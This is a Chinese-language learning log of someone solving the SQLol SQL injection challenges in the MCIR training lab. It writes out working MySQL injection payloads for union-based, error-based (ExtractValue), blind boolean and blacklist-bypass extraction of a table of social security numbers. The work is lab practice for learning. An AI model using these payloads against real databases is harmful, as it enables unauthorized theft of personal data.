MCIR下注入学习记录

环境： xampp-win32-5.6.3-0-VC11    mcir

前言

mcir也是十大之一，可是怎么感受没人写点关于它的博文等信息呢？这样对于一个新手来学习这个系统真的顿感吃力，很难很难....我计划是两天学习整理资料。可是都一天过去了，我还在抓瞎，用去的时间，跟实际所作的事，感受整我的都很差了，啊，鸭梨好大！！！

最后搜到youtube上的视频，稍微看了下，猜有些感受，视频地址： Riding the Magical Code Injection Rainbow (MCIR) with Daniel Crowley

严归
郑赚

准备

首先在程序中更改数据库连接密码(若是用的是集成环境xampp，那么将密码设置为空就好)，在文件

D:\xampp\htdocs\mcir\sqlol\includes\database.config.php

开始

在进入主页后，选择SQLol进入，看到这个

| INSERT || UPDATE || DELETE || SELECT || Custom || Challenges |

选择Challenges，进入后会看到以下图片：

咱们照他的挑战等级，一个一个挑战。

Challenge 0

这个很简单，要求获得全部用户名信息：

Your objective is to get the query to return all usernames instead of just one.

提示给出是字符型，那么直接用以下语句并获得其结果：

固然除了 ' or '1'='1 ,咱们也能用官方视频提供的 '=' 注入方法

Challenge 1

在挑战一中，要求以下：

Your objective is to find the table of social security numbers present in the database and extract its information.

须要找表了，这个个人作法以下：

order by 猜到结果集的字段长度： 1
而后获得用户链接，数据库版本。语句以下：

' and 1=2 union select concat_ws(char(32,58,32),user(),database(),version()) #

结果是： root@localhost : sqlol : 5.6.21

而后咱们猜sqlol下的表：

' and 1=2 union select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x73716C6F6C #

获得两张表： ssn 、 users

要咱们获得 social security numbers ，再看着两张表，咱们知道应该就是ssn表了，好吧，开始获得ssn表下的全部字段

' and 1=2 union select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x73736E #

获得两个字段： name 、 ssn

而后就爆出字段下的值

' and 1=2 union select concat_ws(char(32,58,32),name , ssn ) from ssn #

获得的信息以下图：

　Challenge 2 - The Failure of Quote Filters

　
在挑战二中，咋一看要求跟上面的如出一辙呢。直接把上面最后的语句复制过去。咦，报错了，在仔细看了看挑战的描述：

Many people sanitize or remove single quotes in their Web applications to prevent SQL injection attacks. While this can be effective against injection into string parameters, it is ineffective at preventing injection into parameters which are not quote delimited, like integers or datetime values. This places restrictions on how your injection string can be written, but does not present much of an obstacle to an attacker.

老老实实硬着头皮看了看，发现web应用程序过滤了单引号. 故此咱们去掉单引号试试：

and 1=2 union select concat_ws(char(32,58,32),name , ssn ) from ssn #

获得结果以下：

Challenge 3 - Death Row

对该挑战的描述以下：

You don't always have the luxury of retrieving all rows of output from a query when performing an SQL injection attack. Sometimes, you only get one row. This challenge is similar to challenge 1, "SQL Injection 101", but only provides one row of output. To make things more challenging, this challenge configuration does not show you the query.

大概意思是要求跟挑战一 同样，可是获得的结果再也不是全部行记录，而只是一次只返回一行。

对于这样的类型，咱们构造的语句以下：

' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 0 #
' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 1 #
...

Challenge 4 - War on Error

且看描述：

In this challenge, no output from the query is shown, but verbose errors are shown.

Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT blind SQL injection techniques.

这是查询结果不能显示，须要构造语句到错误显示处。（这里必定是要开错误提示的）

构造语句以下：

' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 0)))='a
' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 1)))='a
...

Challenge 5 - Blind Luck

且看描述：

You must perform a basic Blind SQL injection attack. Only an indication of whether the query returned results is available.

这是关闭了错误提示，在盲注下进行注入。

对于这种注入，结果会返回boolean型，咱们在构造时，要构形成判断型语句？？？而且必定要用or ???

' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 79 #
' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 71 #
' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 67 #

Challenge 6 - Stack the Deck

In this challenge, you must utilize stacked queries due to the difficulty of extraction in the SQLi scenario.

Your objective is to create a new table called "ipwntyourdb" using stacked queries.

挑战六是堆叠查询，可是php冒是不支持啊，请参见这里描述：SQL：php+mysql支持stacked query（堆叠查询）吗？

并且这个挑战好像没实现的感受 ----

Challenge 7 - Walking on Thin Ice

In this challenge, no output from the query is shown, but verbose errors are shown.

Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT deleting anything from the database.
(If you do happen to destroy the database, you can always use the SQLol reset button to bring it back to its original state.)

....有关delete的注入漏洞，目前不知道怎么到

Challenge 8 - Black Comedy

You must perform a very basic SQL injection attack, but a primitive blacklisting filter is in place.

Your objective is to find the table of social security numbers present in the database and extract its information.

默认的黑名单过滤，可是能够绕过，注入语句以下：

' uNion seLect concat(name,':',ssn) from ssn uNion selEct null from users whEre username='

Challenge 9 - Administrative Tasks

In this challenge, you are working with an UPDATE query. The query updates the field "username" in the "users" table for a given user.

Your objective is to inject into the query and cause it to update the "isadmin" field to 1 for the user with id 3.

未实现-----